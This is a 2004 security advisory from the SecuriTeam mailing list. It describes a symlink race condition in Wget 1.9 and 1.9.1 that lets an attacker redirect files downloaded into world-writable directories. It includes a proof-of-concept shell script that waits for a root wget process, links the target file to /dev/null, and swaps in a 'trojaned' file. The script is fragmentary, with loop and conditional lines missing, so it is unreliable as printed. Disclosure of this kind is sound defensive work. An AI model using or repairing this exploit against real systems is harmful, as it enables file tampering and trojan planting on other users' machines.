[UNIX] Wget Race Condition Vulnerability Allows a Symlink Attack
From: SecuriTeam (support_at_securiteam.com)
To: firstname.lastname@example.org Date: 18 May 2004 19:05:50 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
- - - - - - - - -
Wget Race Condition Vulnerability Allows a Symlink Attack
" <http://www.gnu.org/directory/wget.html> Wget is a network utility to
retrieve files from the Web using http and ftp, the two most widely used
Internet protocols. It works non-interactively, so it will work in the
background, after having logged off. The program supports recursive
retrieval of web-authoring pages as well as ftp sites you can use wget to
make mirrors of archives and home pages or to travel the Web like a WWW
It is possible to create a symbolic link attack on wget when retrieving
files, which will result in a file written in a completely different
location than intended.
* Wget versions 1.9, 1.9.1, possibly prior
Wget checks for the presence of a file with the same name as the one
invoked at the command line. If the file exists, it saves the downloaded
file under a different name. The problem stems from not locking the file
prior to writing to it, which allows an attacker to create a symbolic link
from the file to another file before wget is writing it, thereby diverting
the output to anywhere desired (on world writeable directories naturally).
An example of an attack sequence:
* Wget process starts
* File checking (but not locking!)
* Attacker creates a symlink
* Wget writes to the wrong place
A proof-of-concept script is provided that can be used in the following
* Open a shell and execute wget_race.sh with user A
* Open another shell and with root user launch wget from /tmp:
* Check the content of /tmp/patch-2.4.26.bz2
rm -f salida.txt pid.txt *.wget /tmp/patch-2.4.26.bz2
echo "Waiting for Wget execution..."
while [ "$a" == 1 ]
ps auxw|grep wget|grep patch-2.4.26.bz2>>salida.txt
echo "Process catched!"
pgrep -u root wget>pid.txt
ln -s /dev/null /tmp/patch-2.4.26.bz2
echo "/dev/null link created!"
echo "Waiting for downloading to finish..."
b=`pgrep -u root wget`
while [ "$c" == 1 ]
if [ -e .wget ]
echo "Downloading finished! Let's delete the original file, and put
our trojaned file :-)"
rm -f /tmp/patch-2.4.26.bz2
echo "Does it worked "
ls -la /tmp/patch-2.4.26.bz2
b=`pgrep -u root wget`
The information has been provided by
<mailto:email@example.com> ugo "VXzquez" CaramXs.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: firstname.lastname@example.org
In order to subscribe to the mailing list, simply forward this email to: email@example.com
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.